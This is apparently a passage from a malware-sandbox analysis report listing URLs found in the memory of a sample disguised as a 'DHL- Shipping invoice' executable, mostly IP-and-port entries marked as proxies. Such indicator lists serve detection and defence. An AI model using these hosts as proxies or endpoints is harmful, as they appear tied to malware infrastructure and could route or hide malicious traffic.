                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.95.160.178:18951
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.95.160.178:18951://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.95.160.178:48223://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.11.222.22
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.11.222.22://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.11.222.22:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.147.114.50:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.147.114.50:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.166.131.50:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.166.131.50:5678://proxy0
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.4.7.20:43100
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.4.7.20:43100://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.44.210.174
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.44.210.174://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.44.210.174:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.226.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.226.214:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.226.214:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.228.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.228.193:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.228.193:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.229.249:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.229.249:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.231.38:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.231.38:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.235.9:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.235.9:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.235.9:4145x
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.236.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.236.97:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.236.97:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.237.34:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.237.34:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98155B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.239.1:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.239.1:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.93.2.222:8000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.93.2.222:8000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.93.2.226:8000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.93.2.226:8000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.198.241.47
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9806FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.198.241.47://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.198.49.49:3240
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.198.49.49:3240://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.208
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.208.59.2:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.208.59.2:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.255.176.161:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.255.176.161:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.42.194.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.42.194.37:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.42.194.37:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.92.56.162:39500
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.92.56.162:39500://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.21.52.220:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.21.52.220:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.24.122.46
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.24.122.46://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.24.122.46:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.48.111.7:8674
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.48.111.7:8674://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.76.96.180:5566
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.76.96.180:5566://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980A53000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9802FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.91.66.30:42711
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9803B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.91.66.30:42711://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.120.160.148:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.120.160.148:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.106.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.106.145:12334
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.106.145:12334://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.106.192:12334
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.106.192:12334://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.106.193:12334
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.106.193:12334://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.196.4:4555
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.196.4:4555://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.212.228:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.212.228:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.101.222:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.101.222:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.57.169:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.57.169:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.147.11:62801
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.147.11:62801://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.155.82:16276
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.155.82:16276://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.18.246:25810://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980BB4000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.18.246:30673
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.18.246:30673://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.18.246:64741
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.18.246:64741://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.18.246:9986
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.243.214
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.243.214://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98165F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.243.214:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.70.101.95:4154
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.70.101.95:4154://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.70.80.76
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.70.80.76://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.70.80.76:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:11070
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:11070://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:24230
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:24230://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:40234
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:40234://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:55361
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:55361://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.182.140.176:4016://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.182.180.242
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.182.180.242://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.182.180.242:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.182.194.76:29703
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.182.194.76:29703://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.8
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.83:10006
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.83:10006://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.85:10011
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98165F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.85:10011://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.86:10000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.86:10003
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.86:10003://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.92.244
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.92.244://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.92.244:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.92.251:9401
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.92.251:9401://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.101.163.165:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.101.163.165:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.187:16320
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.187:16320://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.187:20962
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.66.130.187:20962://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.206.250:14076
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.206.250:14076://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.206.84:30651
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.206.84:30651://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98071A000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.206.84:32347
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.206.84:32347://proxyx
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:16203
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:16203://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:38088://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:39027
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:39027://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:39458
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.209.174:39458://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.210.123:17499
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.210.123:17499://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.210.123:20268
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.210.123:20268://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.210.123:33553
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.210.123:33553://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.212.125:24671
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.212.125:24671://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.212.252:33516
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.230:9389
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.230:9389://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.230:9790
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.79:11423
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.79:11423://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.79:11546
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.79:11546://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.79:38538
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.79:38538://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.79:48623
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.215.79:48623://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.5
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:39396
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:39396://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:39396HNz
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:42312
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://148.72.23.56:42312://proxy
